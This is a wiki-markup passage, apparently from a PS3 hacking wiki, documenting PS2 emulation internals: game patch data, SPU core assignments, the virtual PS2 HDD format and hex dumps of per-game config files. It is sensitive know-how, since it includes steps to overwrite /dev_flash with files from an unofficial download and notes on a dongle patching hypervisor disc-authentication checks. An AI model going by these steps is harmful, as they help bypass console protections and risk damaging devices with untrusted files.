&quot;PP.SCUS-97266.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SCUS97275&quot; || &quot;SCUS97275&quot; || 0x02 || &quot;SOCOM&quot; || 0 || &quot;PP.SCUS-97275..SOCOM_II&quot; || 0x02<br /> |-<br /> |0xFFFF || &quot;SCUS97474&quot; || &quot;SCUS97275&quot; || 0x02 || &quot;SOCOM&quot; || 0 || &quot;PP.SCUS-97275..SOCOM_II&quot; || 0x02<br /> |-<br /> |0xFFFF || &quot;SCUS97340&quot; || &quot;SCUS97275&quot; || 0x02 || &quot;SOCOM&quot; || 0 || &quot;PP.SCUS-97275..SOCOM_II&quot; || 0x02<br /> |-<br /> |0xFFFF || &quot;SCUS97341&quot; || &quot;SCUS97275&quot; || 0x02 || &quot;SOCOM&quot; || 0 || &quot;PP.SCUS-97275..SOCOM_II&quot; || 0x02<br /> |-<br /> |0xFFFF || &quot;SCUS97342&quot; || &quot;SCUS97275&quot; || 0x02 || &quot;SOCOM&quot; || 0 || &quot;PP.SCUS-97275..SOCOM_II&quot; || 0x02<br /> |-<br /> |0xFFFF || &quot;SCUS97442&quot; || &quot;SCUS97275&quot; || 0x02 || &quot;SOCOM&quot; || 0 || &quot;PP.SCUS-97275..SOCOM_II&quot; || 0x02<br /> |-<br /> |0xFFFF || &quot;SCUS97545&quot; || &quot;SCUS97275&quot; || 0x02 || &quot;SOCOM&quot; || 0 || &quot;PP.SCUS-97275..SOCOM_II&quot; || 0x02<br /> |}<br /> <br /> In PS2 Emulator same Title IDs are present with following information: <br /> SLPS25200 FINAL FANTASY XI : 0x100000000 (4 GB?)<br /> SCUS97269 FINAL FANTASY XI : 0x300000000 (12GB?)<br /> SLPM65981 Front Mission Online : 0x100000000 (4 GB?)<br /> SLPM65197 Nobunagas Ambition Online : 0x200000000 (8 GB?)<br /> <br /> === Title Patch Data in ps2_emu ===<br /> <br /> Mangled Title comes from system.cnf. It reads for example: &quot;SCES_502.94;1&quot; from &quot;\&quot; to 0xA.<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> ! PS2 Title !! Patch Type !! Data<br /> |-<br /> |0x6B1ADE00D|| patch data || 0x147C (sector?) , 0x580 (offset?)<br /> data1<br /> 00 01 01 3C lui at,0x0100<br /> 80 BF 03 3C lui v1,0xBF80<br /> C8 10 63 8C lw v1,0x10C8(v1)<br /> 24 18 61 00 and v1,at<br /> FB FF 61 10 beq v1,at, -0x10<br /> 00 00 00 00 nop <br /> data2<br /> FF FF 01 24 li at,-0x1<br /> 04 00 61 14 bne at,v1, +0x14<br /> 00 80 01 3C lui at,0x8000<br /> 02 00 41 14 bne at,v0, +0x0C<br /> 00 00 00 00 nop <br /> 0D 00 06 00 break <br /> |-<br /> |0x23D92589C5|| patch data || 0x3AEDA (sector?), 0x120 (offset?)<br /> data1<br /> 06 00 80 14 bnez a0, +0x1C<br /> 21 20 43 00 addu a0,v0,v1<br /> 21 10 A0 00 move v0,a1<br /> 02 00 A0 14 bnez a1, +0x0C<br /> 00 00 00 00 nop <br /> 01 00 05 24 li a1,0x1<br /> EB FF 40 10 beqz v0, -0x50<br /> 04 00 84 24 addiu a0,0x4<br /> FC FF 90 24 addiu s0,a0,-0x4<br /> 00 00 00 00 nop <br /> data2<br /> 07 00 80 14 bnez a0, +0x20<br /> 21 80 43 00 addu s0,v0,v1<br /> 21 10 A0 00 move v0,a1<br /> 02 00 A0 14 bnez a1, +0x0C<br /> 00 00 00 00 nop <br /> 01 00 05 24 li a1,0x1<br /> FC FF 40 10 beqz v0, -0x0C<br /> 00 00 00 00 nop <br /> 04 00 04 26 addiu a0,s0,0x4<br /> 00 00 00 00 nop <br /> |-<br /> |0x24D92589D5|| new SPU2 params || 1<br /> |-<br /> |0x608634992D|| new SPU2 params || 1<br /> |-<br /> |0x5CA15DF14D|| Setting mecha HACK to show GODZCD as GODZCDDA ||<br /> |}<br /> <br /> === Difference Emulator Usage ===<br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;4&quot; | PS2_GX<br /> |-<br /> ! Core !! Job !! Source !! Notes<br /> |-<br /> | SPU0 || IOP || SPU ASM || <br /> |-<br /> | SPU1 || DMA || SPU ASM || <br /> |-<br /> | SPU2 || Isolation || C++ Raw SPU || Used for MagicGate Encryption and others (?)<br /> |-<br /> | SPU3 || IPU || SPU ASM || <br /> |-<br /> | SPU4 || GFIF || SPU ASM || <br /> |-<br /> | SPU5 || PS2-SPU2 || C++ || about 50% load average<br /> |-<br /> | SPU6 || VU1 || SPU ASM ||<br /> |-<br /> | SPU7 || - || - || Unavailable: Factory disabled SPU<br /> |-<br /> | PPU:0 || PS2-Devices || C++ and PPU ASM ||<br /> |-<br /> | PPU:1 || Emotion Engine || C++ and PPU ASM ||<br /> |-<br /> | PS2-GS || Graphic Synthesizer || Hardware PS2-GS || Present in CECHC/COK-002 <br /> |-<br /> ! colspan=&quot;4&quot; | PS2 (GS+EE)<br /> |-<br /> ! Core !! Job !! Source !! Notes<br /> |-<br /> | SPU0 || IOP || SPU ASM || <br /> |-<br /> | SPU2 || Isolation || C++ Raw SPU || Used for MagicGate Encryption and others (?)<br /> |-<br /> | - || DMA || Hardware PS2-EE ||<br /> |-<br /> | - || VU1 || Hardware PS2-EE ||<br /> |-<br /> | - || IPU || Hardware PS2-EE ||<br /> |-<br /> | - || GFIF || Hardware PS2-EE ||<br /> |-<br /> | SPU5 || PS2-SPU2 || C++ || about 50% load average<br /> |-<br /> | SPU7 || - || - || Unavailable: Factory disabled SPU<br /> |-<br /> | PPU:0 || PS2-Devices || C++ and PPU ASM ||<br /> |-<br /> | PPU:1 || - || - || unused?<br /> |-<br /> | PS2-EE || Emotion Engine || Hardware PS2-EE || Present in CECHA/COK-001 and CECHB/COK-001 <br /> |-<br /> | PS2-GS || Graphic Synthesizer || Hardware PS2-GS || Present in CECHA/COK-001 and CECHB/COK-001 <br /> |-<br /> ! colspan=&quot;4&quot; | PS2 Software<br /> |-<br /> | colspan=&quot;5&quot; | problematic, see Mathieulh quoted below<br /> &lt;pre&gt;<br /> The main issue here is that it's mostly not doable to emulate the GS efficiently with the rest<br /> of the hardware because the RSX is just not meant for this task and cannot emulate the GS on <br /> its own while all the available SPUs and the PPU are already mostly fully used to emulate the <br /> rest of the playstation 2 hardware, this explains why sony never could finish the ps2_softemu <br /> and that it reached a stalling step.<br /> <br /> I honestly have no idea on how it would be possible to get over the ps3 hardware limitations to<br /> perform a full ps2 emulation without any of the ps2 hardware present on the console, one thing <br /> for sure is that the emulator would have to be entirely rewritten and optimized like no other <br /> ps3 software has been.<br /> &lt;/pre&gt;<br /> |-<br /> ! Core !! Job !! Source !! Notes<br /> |-<br /> | SPU0 || IOP || SPU ASM || <br /> |-<br /> | SPU1 || EEDMA || SPU ASM || <br /> |-<br /> | SPU2 || Isolation || C++ Raw SPU || Used for MagicGate Encryption and others (?)<br /> |-<br /> | SPU || GSE || SPU ASM || Graphic Synthesizer <br /> |-<br /> | SPU3 || IPU || SPU ASM || <br /> |-<br /> | SPU4 || GSEGFIF || SPU ASM || <br /> |-<br /> | SPU5 || PS2-SPU2 || C++ ||<br /> |-<br /> | SPU6 || VU1 || SPU ASM ||<br /> |-<br /> | SPU7 || - || - || Unavailable: Factory disabled SPU<br /> |-<br /> | PPU:0 || PS2-Devices || C++ and PPU ASM ||<br /> |-<br /> | PPU:1 || Emotion Engine || C++ and PPU ASM ||<br /> |-<br /> ! colspan=&quot;4&quot; | PS2 Netemu<br /> |-<br /> ! Core !! Job !! Source !! Notes<br /> |-<br /> | SPU0 || IOP || || <br /> |-<br /> | SPU1 || SPU2 || || <br /> |-<br /> | SPU2 || VU1 || || <br /> |-<br /> | SPU3 || EEDMA || || <br /> |-<br /> | SPU4 || FE || || <br /> |-<br /> | SPU5 || BE || ||<br /> |-<br /> | SPU6 || IPU || ||<br /> |-<br /> | SPU7 || BE || || <br /> |-<br /> |}<br /> <br /> === PS2 System Data (PSN HDD Tool package) ===<br /> http://www.divshare.com/download/17366296-5ec<br /> <br /> http://www.psxstore.com/en/1538/utilities/ps3/apps-psn/ps2-system-data.html<br /> <br /> Content ID: IP9100-NPIA00001_00-PS2HDDSYSDAT0001<br /> QA Digest: 2A876715D42678BB7A6E00C030C0121B<br /> HASH: E1B0DBE46FC44190DC7A140681D8B9D4<br /> <br /> http://manuals.playstation.net/document/en/ps3/current/game/hddinstall.html<br /> <br /> '''Titles supporting HDD installation'''<br /> * Nobunaga's Ambition Online and Expansion Packs<br /> * Final Fantasy XI (disc1=SCUS97266 disc2=SCUS97269)and Expansion Discs<br /> * SOCOM II: U.S. NAVY SEALs and Related discs included with OPM Issue 87, OPM Issue 88, OPM Issue 89, OPM Issue 90<br /> * SOCOM 3: U.S. NAVY SEALs<br /> * SOCOM: U.S. NAVY SEALs Combined Assault<br /> * Front Mission Online<br /> * Official PlayStation Magazine Issue 87, 88, 89, 90 Discs<br /> ([[Talk:Emulation#PS2_HDD | non-official ps2hdd gameslist ]])<br /> <br /> There are 2 different &quot;PS2 game&quot; contents that can be installed in PS3 HDD (CATEGORY's [[PARAM.SFO#CATEGORY_For_HDD_contents | 2P and 2G ]]).<br /> '''2P''' are games released from PSN as &quot;PS2 Classic&quot; in .PKG format, and '''2G''' are a few real &quot;PS2 DVD discs&quot; that can be installed in the PS3 HDD, this installation is managed by the '''PS2_system_data.pkg'''.<br /> <br /> This games can be installed in real PS2 (in the internall HDD of a PS2 fat)... later this same installation was used in the [http://en.wikipedia.org/wiki/PSX_(DVR) PSX]... and when implemented in PS3 there was needed to use a '''virtual PS2 HDD''' image file keeping the same format than the original HDD used in PS2.<br /> <br /> ====Virtual PS2 HDD====<br /> Game files (extracted from the real PS2 disc) are installed in a '''IMAGE.DAT''' file, this file is a 1:1 &quot;raw copy&quot; of a PS2 HDD.<br /> <br /> This '''IMAGE.DAT''' is placed in the &quot;install folder&quot; (inside USRDIR folder) and his size can vary up to 10+GB<br /> <br /> There are 2 different installations: the most common is used to store &quot;game expansions&quot; (e.g: used by additional content in SOCOM games)... the other type of installation is a &quot;full install&quot; and it seems the only game that uses it is &quot;Final Fantasy XI&quot; (main game installation when the game boots for first time + game expansions added later when needed in the same '''IMAGE.DAT''')<br /> <br /> '''PS2_system_data.pkg''' itself uses an '''IMAGE.DAT''' file (6.43 MB)<br /> <br /> The structure of this &quot;virtual PS2 HDD&quot; uses an &quot;APA header&quot; and a &quot;APA MBR&quot; + several &quot;APA partitions&quot;, some of them containing &quot;PFS filesystems&quot;.<br /> <br /> Error message trying to boot a CATEGORY &quot;2G&quot; game with hand-made SFO's and invalid IMAGE.DAT file:<br /> '''The game partition for this game cannot be created because the installed game is corrupted.'''<br /> '''To perform this operation, delete the game, and then reinstall the game using the disc.'''<br /> <br /> *Notes<br /> **List of PS2 disc games compatibles with PS3 HDD installation hardcoded in '''dev_flash/vsh/module/[[game_ext_plugin]].sprx'''<br /> **Virtuall PS2 HDD support module '''dev_flash/vsh/module/[[libps2hdd]].sprx''' ?<br /> <br /> === Getting Playstation 2 Software Emulator working ===<br /> <br /> Method (on Firmware 3.55, without! Cobra-USB Dongle or Downgrade) for all consoles (fat &amp; slim).<br /> <br /> 1. Replace following files on your consoles /dev_flash/<br /> with the ones included in this archive<br /> p3dwik-ps2compatfiles.rar<br /> 2. Get into Factory Service Mode (FSM Tool/Dongle)<br /> 3. Insert your Original PS2 Game Disc<br /> 4. It will run.<br /> <br /> Note: Backups wont work. You're getting the compatibility of the 2.60 software emulator with all of its bugs.<br /> <br /> Download: [http://www.sendspace.com/file/bm9z9v p3dwik-ps2compatfiles.rar]&lt;br&gt;<br /> Possible compatibility Lists:<br /> * http://tortuga-cove.com/forums/viewtopic.php?f=57&amp;t=530<br /> * [[Talk:Emulation#PS2.2FPStwo]]<br /> <br /> === PS2 Compat. flag ===<br /> <br /> See: [[PS2_Compatibility#Software]]<br /> <br /> <br /> === Cobra USB Dongle ===<br /> <br /> taken from storage_ext.c<br /> <br /> &lt;pre&gt; patch_ps2emu_entry(ps2emu_type); &lt;/pre&gt;<br /> <br /> * sets proper ps2_(gx/soft)emu.self path for reboot<br /> * patches ss_storage service 0x5004 disc checks on ss_server3.self inside lv1<br /> (Change from Parameter li r3, 2 and li r3, 1E (Drive Authentification) to li r3, 0x29 (Reset Drive))<br /> * and the usual either replace read/ioctl for iso etc.<br /> <br /> === Memory Mapping ===<br /> (PCSX2)<br /> Mapping host memory for virtual systems...<br /> EE Main Memory @ 0x20000000 -&gt; 0x22884000 [40mb]<br /> IOP Main Memory (2mb) @ 0x24000000 -&gt; 0x24211000 [2mb]<br /> VU0/1 on-chip memory @ 0x28000000 -&gt; 0x2800A000 [40kb]<br /> Reserving memory for recompilers...<br /> SuperVU0 Recompiler Cache @ 0x0E800000 -&gt; 0x0F000000 [8mb]<br /> SuperVU1 Recompiler Cache @ 0x0F000000 -&gt; 0x0F800000 [8mb]<br /> Micro VU0 Recompiler Cache @ 0x3C000000 -&gt; 0x40000000 [64mb]<br /> Micro VU1 Recompiler Cache @ 0x40000000 -&gt; 0x44000000 [64mb]<br /> (thread:MTVU) Calling pthread_create...<br /> R5900-32 Recompiler Cache @ 0x30000000 -&gt; 0x34000000 [64mb]<br /> R3000A Recompiler Cache @ 0x34000000 -&gt; 0x36000000 [32mb]<br /> VIF0 Unpack Recompiler Cache @ 0x36000000 -&gt; 0x36800000 [8mb]<br /> VIF1 Unpack Recompiler Cache @ 0x38000000 -&gt; 0x38800000 [8mb]<br /> <br /> (ps2netemu)<br /> Mapping ELF @ 0x200000000<br /> <br /> === CONFIG File ===<br /> <br /> union{<br /> uint32_t command<br /> ...data...<br /> }<br /> <br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! Title ID !! Title !! Config Data !! Revision !! Notes<br /> |-<br /> | NPUD20461 || Bloodrayne || <br /> 00000000 3D 00 00 00 46 3E 00 00 16 00 00 00 0B 00 00 00 =...F&gt;..........<br /> 00000010 04 00 00 00 07 01 00 00 C0 02 00 00 10 00 00 00 ........+.......<br /> 00000020 00 09 3C 52 52 3C 09 00 03 1F 90 14 14 90 1F 03 ..&lt;RR&lt;....É..É..<br /> 00000030 00 09 3C 52 52 3C 09 00 03 20 C0 04 04 C0 20 03 ..&lt;RR&lt;... +..+ .<br /> 00000040 56 A0 09 00 10 00 00 00 04 00 00 00 00 00 90 01 Vá............É.<br /> 00000050 FA 0F BD 01 21 39 07 00 B8 06 00 00 28 00 00 00 ·.¢.!9..©...(...<br /> 00000060 35 4A 02 02 00 0A 54 38 35 4A 62 7E 34 A5 00 A0 5J....T85Jb~4Ñ.á<br /> 00000070 3C 09 00 1B 35 29 FA 00 00 09 4C 38 35 29 02 02 &lt;...5)·...L85)..<br /> 00000080 00 09 4C 38 35 29 62 7E 35 4A 02 03 00 0A 54 38 ..L85)b~5J....T8<br /> 00000090 35 4A 22 7E 34 A5 00 A0 3C 09 00 1B 35 29 FA 00 5J&quot;~4Ñ.á&lt;...5)·.<br /> 000000A0 00 09 4C 38 35 29 02 03 00 09 4C 38 35 29 22 7E ..L85)....L85)&quot;~<br /> 000000B0 27 39 07 00 80 03 00 00 24 00 00 00 35 6B 02 02 '9..Ç...$...5k..<br /> 000000C0 00 0B 5C 38 35 6B 62 7E 3C 0C 00 1B 35 8C FA 00 ..\85kb~&lt;...5î·.<br /> 000000D0 00 0C 64 38 35 8C 02 02 00 0C 64 38 35 8C 62 7E ..d85î....d85îb~<br /> 000000E0 35 6B 02 03 00 0B 5C 38 35 6B 22 7E 3C 0C 00 1B 5k....\85k&quot;~&lt;...<br /> 000000F0 35 8C FA 00 00 0C 64 38 35 8C 02 03 00 0C 64 38 5î·...d85î....d8<br /> 00000100 35 8C 22 7E 5î&quot;~<br /> || 15942 (4.00+) ||<br /> 0x3D =&gt; 0x3E46 (15942)<br /> 0x16 =&gt; 0xB =&gt; 4<br /> 0x107, (sector)<br /> 0x2C0, (offset -&gt; 0x1072B4 in iso)<br /> 0x10, <br /> 0x523C0900, (beql s1, gp, ?)<br /> 0x00093C52, (mflo a3)<br /> 0x14901F03, (bne a0, s0, ?)<br /> 0x031F9014, (dsllv s2, ra, t8)<br /> 0x523C0900, (beql s1, gp, ?)<br /> 0x00093C52, (mflo a3)<br /> 0x04C02003, (bltz a2, ?)<br /> 0x0320C004 (sllv t8, zero, t9)<br /> 0x9A056, (sector)<br /> 0x10, (offset -&gt; 0x4D02B004 in iso)<br /> 0x04, <br /> 0x01900000 (sll zero, s0, 0x00?), <br /> 0x01BD0FFA (dsrl at,sp,0x1F?)<br /> 0x73921, (sector)<br /> 0x6B8, (offset -&gt; 0x39C90EAC in iso)<br /> 0x28, <br /> 21 39 07 00 addi t9,t1,0x0700<br /> B8 06 00 00 swr a2,(zero)<br /> 28 00 00 00 slti zero,0x0000<br /> 35 4A 02 02 ori t2,0x202<br /> 00 0A 54 38 dsll t2,0x10<br /> 35 4A 62 7E ori t2,0x627E<br /> 34 A5 00 A0 ori a1,0xA0<br /> 3C 09 00 1B lui t1,0x001B<br /> 35 29 FA 00 ori t1,0xFA00<br /> 00 09 4C 38 dsll t1,0x10<br /> 35 29 02 02 ori t1,0x202<br /> 00 09 4C 38 dsll t1,0x10<br /> 35 29 62 7E ori t1,0x627E<br /> 35 4A 02 03 ori t2,0x203<br /> 00 0A 54 38 dsll t2,0x10<br /> 35 4A 22 7E ori t2,0x227E<br /> 34 A5 00 A0 ori a1,0xA0<br /> 3C 09 00 1B lui t1,0x001B<br /> 35 29 FA 00 ori t1,0xFA00<br /> 00 09 4C 38 dsll t1,0x10<br /> 35 29 02 03 ori t1,0x203<br /> 00 09 4C 38 dsll t1,0x10<br /> 35 29 22 7E ori t1,0x227E<br /> 0x73927, (sector)<br /> 0x380, (offset -&gt; 0x39C93B74 in iso)<br /> 0x24, <br /> 35 6B 02 02 ori t3,0x202<br /> 00 0B 5C 38 dsll t3,0x10<br /> 35 6B 62 7E ori t3,0x627E<br /> 3C 0C 00 1B lui t4,0x001B<br /> 35 8C FA 00 ori t4,0xFA00<br /> 00 0C 64 38 dsll t4,0x10<br /> 35 8C 02 02 ori t4,0x202<br /> 00 0C 64 38 dsll t4,0x10<br /> 35 8C 62 7E ori t4,0x627E<br /> 35 6B 02 03 ori t3,0x203<br /> 00 0B 5C 38 dsll t3,0x10<br /> 35 6B 22 7E ori t3,0x227E<br /> 3C 0C 00 1B lui t4,0x001B<br /> 35 8C FA 00 ori t4,0xFA00<br /> 00 0C 64 38 dsll t4,0x10<br /> 35 8C 02 03 ori t4,0x203<br /> 00 0C 64 38 dsll t4,0x10<br /> 35 8C 22 7E ori t4,0x227E<br /> |-<br /> | NPUD20862 || Bloodrayne 2 ||<br /> 00000000 3D 00 00 00 3D 3F 00 00 15 00 00 00 04 00 00 00 =...=?..........<br /> 00000010 26 00 00 00 00 00 34 00 00 00 35 00 00 00 00 00 &amp;.....4...5.....<br /> 00000020 53 4C 55 53 2D 32 30 38 36 32 SLUS-20862<br /> || 16189 (4.00+) ||<br /> 0x3D =&gt; 0x3F3D (16189)<br /> 0x15 =&gt; 4<br /> 0x26 =&gt; 0x340000, 0x350000<br /> |-<br /> | NPUD21269 || Bully ||<br /> 00000000 3D 00 00 00 89 3D 00 00 17 00 00 00 01 00 00 00 =....=..........<br /> 00000010 00 00 00 00 53 4C 55 53 2D 32 31 32 36 39 ....SLUS-21269<br /> || 15753 (3.73+) ||<br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x17 =&gt; 1<br /> |-<br /> | NPJD00004 || Contra Shattered Soldier || <br /> 00000000 3D 00 00 00 BF 3F 00 00 0A 00 00 00 12 00 00 00 =...+?..........<br /> 00000010 A0 FF 0F 00 00 00 00 00 10 00 01 3C A4 FF 0F 00 á .........&lt;ñ ..<br /> 00000020 00 00 00 00 90 FF 24 8C A8 FF 0F 00 00 00 00 00 ....É $î¿ ......<br /> 00000030 81 00 85 2C AC FF 0F 00 00 00 00 00 06 00 A0 10 ü.à,¼ ........á.<br /> 00000040 B0 FF 0F 00 00 00 00 00 01 00 84 24 B4 FF 0F 00 ¦ ........ä$¦ ..<br /> 00000050 00 00 00 00 90 FF 24 AC B8 FF 0F 00 00 00 00 00 ....É $¼© ......<br /> 00000060 81 00 85 2C BC FF 0F 00 00 00 00 00 02 00 A0 14 ü.à,+ ........á.<br /> 00000070 C0 FF 0F 00 00 00 00 00 00 00 00 00 C4 FF 0F 00 + ..........- ..<br /> 00000080 00 00 00 00 00 07 02 34 C8 FF 0F 00 00 00 00 00 .......4+ ......<br /> 00000090 08 00 E0 03 CC FF 0F 00 00 00 00 00 00 00 00 00 ..Ó.¦ ..........<br /> 000000A0 D0 FF 0F 00 00 00 00 00 10 00 01 3C D4 FF 0F 00 ð .........&lt;È ..<br /> 000000B0 00 00 00 00 08 00 E0 03 D8 FF 0F 00 00 00 00 00 ......Ó.Ï ......<br /> 000000C0 90 FF 20 AC DC FF 0F 00 00 00 00 00 00 00 00 00 É  ¼_ ..........<br /> 000000D0 C0 72 42 00 08 00 E0 03 E8 FF 03 08 B4 7C 42 00 +rB...Ó.Þ ..¦|B.<br /> 000000E0 08 00 E0 03 F4 FF 03 08 00 00 00 00 53 4C 50 4D ..Ó.¶ ......SLPM<br /> 000000F0 2D 36 32 32 34 37 -62247<br /> || 16319 (4.10+)||<br /> 0x3D =&gt; 0x3FBF (16319)<br /> 0x0A =&gt; 0x12, <br /> 0xFFFA0,0, 0x3C010010 lui at,0x0010 <br /> 0xFFFA4,0, 0x8C24FF90 lw a0,-0x70(at) <br /> 0xFFFA8,0, 0x2C850081 sltiu a1,a0,0x0081 <br /> 0xFFFAC,0, 0x10A00006 beqz a1,pos_000FFFC8 <br /> 0xFFFB0,0, 0x24840001 addiu a0,0x1 <br /> 0xFFFB4,0, 0xAC24FF90 sw a0,-0x70(at) <br /> 0xFFFB8,0, 0x2C850081 sltiu a1,a0,0x0081 <br /> 0xFFFBC,0, 0x14A00002 bnez a1,pos_000FFFC8 <br /> 0xFFFC0,0, 0x00000000 nop <br /> 0xFFFC4,0, 0x34020700 li v0,0x700 <br /> 0xFFFC8,0, 0x03E00008 jr t9 <br /> 0xFFFCC,0, 0x00000000 nop <br /> 0xFFFD0,0, 0x3C010010 lui at,0x0010 <br /> 0xFFFD4,0, 0x03E00008 jr ra <br /> 0xFFFD8,0, 0xAC20FF90 sw zero,-0x70(at) <br /> 0xFFFDC,0, 0x00000000 nop <br /> 0x4272C0, 0x03E00008 (jr ra), 0x0803FFE8 j pos_000FFFA0<br /> 0x427CB4, 0x03E00008 (jr ra), 0x0803FFF4 j pos_000FFFD0<br /> |-<br /> | NPJC00002 || Dark Cloud ||<br /> 00000000 3D 00 00 00 07 3F 00 00 0F 00 00 00 34 93 23 00 =....?......4.#.<br /> 00000010 FF FF FF 01 09 00 00 00 01 00 00 00 B0 8E 13 00 ................<br /> 00000020 20 00 BF 7F B0 FF BD 27 00 00 00 00 08 00 E0 03 ......'........<br /> 00000030 00 00 00 00 53 43 50 53 2D 31 35 30 30 34 ....SCPS-15004<br /> || 16135 (4.00+)||<br /> 0x3D =&gt; 0x3F07 (16135)<br /> 0x0F =&gt; 0x239334, 0x01FFFFFF<br /> 0x09 =&gt; 1,<br /> 0x138EB0 , <br /> 0x7FBF0020 (sq ra,0x20(sp)),<br /> 0x27BDFFB0 (addiu sp,-0x50),<br /> 0x00000000 (nop),<br /> 0x03E00008 (jr ra)<br /> <br /> 0x239334 = end of code segment?<br /> 0x138EB0 = DrawShadow__10CCharacterFv Function Offset<br /> config 20 00 BF 7F 0x7FBF0020 sq ra, 0x20(sp)<br /> B0 FF BD 27 0x27BDFFB0 addiu sp, -0x50<br /> 00 00 00 00 0x00000000 nop<br /> 08 00 E0 03 0x03E00008 jr ra<br /> |-<br /> | NPUD20071 || Dead Or Alive 2 Hardcore ||<br /> 00000000 3D 00 00 00 F0 42 00 00 0A 00 00 00 01 00 00 00 =....B..........<br /> 00000010 EC 06 2B 00 01 00 06 24 00 00 06 24 0B 00 00 00 ..+....$...$....<br /> 00000020 07 00 00 00 71 6A 18 00 F4 07 00 00 04 00 00 00 ....qj..........<br /> 00000030 0C 00 32 B7 0C 00 32 B3 71 6A 18 00 F4 05 00 00 ..2...2.qj......<br /> 00000040 08 00 00 00 03 E0 00 08 00 00 00 00 27 BD FF F0 ............'...<br /> 00000050 AF BE 00 08 7B 6A 18 00 08 07 00 00 08 00 00 00 ....{j..........<br /> 00000060 03 E0 00 08 00 00 00 00 27 BD FF F0 AF BE 00 08 ........'.......<br /> 00000070 85 6A 18 00 18 01 00 00 08 00 00 00 03 E0 00 08 .j..............<br /> 00000080 00 00 00 00 27 BD FF F0 AF BE 00 08 85 6A 18 00 ....'........j..<br /> 00000090 70 01 00 00 08 00 00 00 03 E0 00 08 00 00 00 00 p...............<br /> 000000A0 27 BD FF F0 AF BE 00 08 85 6A 18 00 C8 01 00 00 '........j......<br /> 000000B0 08 00 00 00 03 E0 00 08 00 00 00 00 27 BD FF F0 ............'...<br /> 000000C0 AF BE 00 08 86 6A 18 00 FC 07 00 00 08 00 00 00 .....j..........<br /> 000000D0 03 E0 00 08 00 00 00 00 27 BD FF F0 AF BE 00 08 ........'.......<br /> 000000E0 00 00 00 00 53 4C 55 53 2D 32 30 30 37 31 ....SLUS-20071 <br /> || 17136 (4.50+) || fixes blackscreen<br /> 0x3D =&gt; 0x42F0 (17136)<br /> 0x0A =&gt; 0x01,<br /> 0x2B06EC, 0x24060001 (li a2,0x1), <br /> 0x24060000 (li a2,0x0)<br /> 0x0B =&gt; 0x07,<br /> 0x186A71, 0x7F4, 0x04, <br /> 0xB732000C (jal -0x2A9B90), <br /> 0xB332000C (jal -0x2A9BA0)<br /> 0x186A71, 0x5F4, 0x08, 0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw fp,0x8(sp)),<br /> 0x186A7B, 0x708, 0x08, 0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw fp,0x8(sp)),<br /> 0x186A85, 0x118, 0x08, 0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw fp,0x8(sp)),<br /> 0x186A85, 0x170, 0x08, 0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw fp,0x8(sp)),<br /> 0x186A85, 0x1C8, 0x08, 0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw fp,0x8(sp)),<br /> 0x186A86, 0x7FC, 0x08, 0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw fp,0x8(sp))<br /> <br /> |-<br /> | NPJD00011 || Dead Or Alive 2 Hardcore || <br /> 00000000 3D 00 00 00 89 3D 00 00 09 00 00 00 01 00 00 00 =...ë=..........<br /> 00000010 6C 66 2B 00 80 00 08 24 01 00 06 24 80 00 08 24 lf+.Ç..$...$Ç..$<br /> 00000020 00 00 06 24 0B 00 00 00 07 00 00 00 05 FF 17 00 ...$......... ..<br /> 00000030 F0 07 00 00 0C 00 00 00 27 C4 00 10 0C 00 32 B7 ­.......'-....2À<br /> 00000040 00 00 00 00 24 04 00 2B 0C 00 32 B3 27 C5 00 10 ....$..+..2¦'+..<br /> 00000050 05 FF 17 00 F4 05 00 00 08 00 00 00 03 E0 00 08 . ..¶........Ó..<br /> 00000060 00 00 00 00 27 BD FF F0 AF BE 00 08 0F FF 17 00 ....'¢ ­»¥... ..<br /> 00000070 08 07 00 00 08 00 00 00 03 E0 00 08 00 00 00 00 .........Ó......<br /> 00000080 27 BD FF F0 AF BE 00 08 19 FF 17 00 18 01 00 00 '¢ ­»¥... ......<br /> 00000090 08 00 00 00 03 E0 00 08 00 00 00 00 27 BD FF F0 .....Ó......'¢ ­<br /> 000000A0 AF BE 00 08 19 FF 17 00 70 01 00 00 08 00 00 00 »¥... ..p.......<br /> 000000B0 03 E0 00 08 00 00 00 00 27 BD FF F0 AF BE 00 08 .Ó......'¢ ­»¥..<br /> 000000C0 19 FF 17 00 C8 01 00 00 08 00 00 00 03 E0 00 08 . ..+........Ó..<br /> 000000D0 00 00 00 00 27 BD FF F0 AF BE 00 08 1A FF 17 00 ....'¢ ­»¥... ..<br /> 000000E0 FC 07 00 00 08 00 00 00 03 E0 00 08 00 00 00 00 ³........Ó......<br /> 000000F0 27 BD FF F0 AF BE 00 08 00 00 00 00 53 4C 50 53 '¢ ­»¥......SLPS<br /> 00000100 2D 32 35 30 32 36 -25026<br /> || 15753 (3.73+) || fixes blackscreen<br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x09 =&gt; 1,<br /> 0x2B666C, <br /> 0x24080080 (li t0,0x80), <br /> 0x24060001 (li a2,0x1), <br /> 0x24080080 (li t0,0x80), <br /> 0x24060000 (li a2,0x0)<br /> 0x0B =&gt; 7, <br /> 0x17FF05, 0x7F0, 0x0C ,<br /> 0x1000C427 addiu a0,fp,0x10,<br /> 0xB732000C jal -0x2A9B90,<br /> 0x00000000 nop, <br /> 0x2B000424 li a0,0x2B,<br /> 0xB332000C jal -0x2A9BA0,<br /> 0x1000C527 addiu a1,fp,0x10,<br /> 0x17FF05, 0x5F4, 0x08 ,0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw 